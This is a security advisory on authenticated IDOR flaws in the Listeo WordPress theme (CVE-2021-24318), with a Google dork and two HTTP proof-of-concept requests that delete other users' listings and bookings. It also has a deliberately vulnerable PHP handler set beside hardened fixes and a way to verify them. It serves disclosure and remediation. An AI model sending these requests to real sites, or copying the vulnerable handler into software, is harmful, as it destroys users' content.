Listeo WordPress Theme <= 1.6.10 - Multiple Authenticated IDOR Vulnerabilities

2021.05.17
m0ze (RU)
Risk: Low
Local: No
Remote: Yes
CWE: CWE-639

/*!
 - # VULNERABILITY: Listeo WordPress Theme <= 1.6.10 - Multiple Authenticated IDOR Vulnerabilities
 - # GOOGLE DORK: inurl:/wp-content/themes/listeo/
 - # DATE: 2021-02-10
 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
 - # VENDOR: Purethemes [ https://purethemes.net ]
 - # SOFTWARE VERSION: <= 1.6.10
 - # SOFTWARE LINK: https://themeforest.net/item/listeo-directory-listings-wordpress-theme/23239259
 - # CVSS: Multiple
 - # CWE: CWE-639
 - # CVE: CVE-2021-24318
*/

### -- [ Info: ]

[i] Multiple Authenticated IDOR vulnerabilities were discovered in the Listeo theme through v1.6.10 for WordPress.
[i] Plugin(s) affected: Listeo Core by Purethemes [ https://purethemes.net ].

### -- [ Vulnerabilities: ]

[x] Authenticated IDOR | Post/page deletion: /my-properties/?action=delete&property_id=&_wpnonce=.
[x] Authenticated IDOR | Booking deletion: action=listeo_bookings_manage&booking_id=&status=deleted.

### -- [ Impact: ]

[~] Any authenticated user can remove content belonging to other users from the targeted website, up to the complete erasure of all content.

### -- [ CVSS 3.1: ]

[%] Authenticated IDOR | Post/page deletion: AV:N/AC:L/PR:L/UI:R/S:U
[%] Authenticated IDOR | Booking deletion: AV:N/AC:L/PR:L/UI:R/S:U

### -- [ PoC #1 | Authenticated IDOR | Permanent post/page deletion: ]

[!] https://listeo.pro/my-listings/?status=pending&action=delete&listing_id=13&_wpnonce=88a432b100

[!] GET /my-listings/?action=delete&listing_id=13&_wpnonce=88a432b100 HTTP/1.1
Host: listeo.pro
Cookie: [user cookies]

### -- [ PoC #2 | Authenticated IDOR | Permanent booking deletion: ]

[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: listeo.pro
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: [user cookies]

action=listeo_bookings_manage&booking_id=13&status=deleted

### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze
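The root cause both PoCs share is that a WordPress nonce is a CSRF token, not an authorization check: `_wpnonce` in PoC #1 proves only that the caller loaded a page that emitted it, which any logged-in user can do from their own dashboard before swapping in someone else's `listing_id`. The PoC #2 request carries no nonce field at all. The following is an added example written for this page, not Listeo Core's own code: a handler with the IDOR pattern next to a hardened version that keeps the nonce check and adds an object-level ownership check. The post types `listing` and `booking`, the nonce action strings, the `security` POST field, the `_example_status` meta key and every `example_*` function name are assumptions made for illustration.

```php
<?php
/**
 * Added example (not Listeo Core's code). Assumptions, all hypothetical:
 * listings and bookings are post types 'listing' and 'booking' whose owner
 * is post_author; nonce action names, the 'security' field and the
 * '_example_status' meta key are ours.
 */

// VULNERABLE: wp_verify_nonce() succeeds for any logged-in user who has
// loaded their own "My Listings" page. Nothing ties listing_id to the caller.
function example_delete_listing_vulnerable() {
    if ( ! is_user_logged_in() || 'delete' !== ( $_GET['action'] ?? '' ) ) {
        return;
    }
    if ( ! wp_verify_nonce( $_GET['_wpnonce'] ?? '', 'example_my_listings' ) ) {
        wp_die( 'Invalid nonce', '', array( 'response' => 403 ) );
    }
    // No ownership check: IDOR. Force-delete from a GET makes it permanent.
    wp_delete_post( absint( $_GET['listing_id'] ?? 0 ), true );
}

// Object-level authorization: the ID must resolve to a post of the expected
// type, and the caller must own it or already hold delete_post for it (which
// covers administrators without a separate role check).
function example_user_may_delete( $post_id, $expected_type ) {
    $post = get_post( $post_id );
    if ( ! $post || $expected_type !== $post->post_type ) {
        return false;
    }
    return (int) $post->post_author === get_current_user_id()
        || current_user_can( 'delete_post', $post_id );
}

// HARDENED: same nonce check, then ownership, then a reversible soft delete.
function example_delete_listing_hardened() {
    if ( ! is_user_logged_in() || 'delete' !== ( $_GET['action'] ?? '' ) ) {
        return;
    }
    if ( ! wp_verify_nonce( $_GET['_wpnonce'] ?? '', 'example_my_listings' ) ) {
        wp_die( 'Invalid nonce', '', array( 'response' => 403 ) );
    }
    $listing_id = absint( $_GET['listing_id'] ?? 0 );
    if ( ! example_user_may_delete( $listing_id, 'listing' ) ) {
        wp_die( 'Not your listing', '', array( 'response' => 403 ) );
    }
    wp_trash_post( $listing_id );
}

// HARDENED AJAX handler for the action name from PoC #2. It requires a nonce
// in an assumed POST field named 'security', whitelists the status value and
// applies the same ownership check before touching the booking.
function example_bookings_manage_hardened() {
    check_ajax_referer( 'example_bookings_manage', 'security' );
    $booking_id = absint( $_POST['booking_id'] ?? 0 );
    $status     = sanitize_key( $_POST['status'] ?? '' );
    if ( ! in_array( $status, array( 'approved', 'cancelled', 'deleted' ), true ) ) {
        wp_send_json_error( 'Unknown status', 400 );
    }
    if ( ! example_user_may_delete( $booking_id, 'booking' ) ) {
        wp_send_json_error( 'Forbidden', 403 );
    }
    if ( 'deleted' === $status ) {
        wp_trash_post( $booking_id );
    } else {
        update_post_meta( $booking_id, '_example_status', $status );
    }
    wp_send_json_success( array( 'booking_id' => $booking_id, 'status' => $status ) );
}
add_action( 'wp_ajax_listeo_bookings_manage', 'example_bookings_manage_hardened' );
```

To verify a fix of this shape, create two low-privileged accounts, have account A create a listing and a booking, then replay PoC #1 and PoC #2 with account B's cookies and A's object IDs (plus a nonce minted from B's own dashboard). Both requests must return 403 and leave A's objects untouched; a 200 with the object gone means the nonce is being treated as authorization.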

References:

https://m0ze.ru/vulnerability/%5B2021-02-10%5D-%5BWordPress%5D-%5BCWE-639%5D-Listeo-WordPress-Theme-v1.6.10.txt
https://twitter.com/vladm0ze


Copyright 2021, cxsecurity.com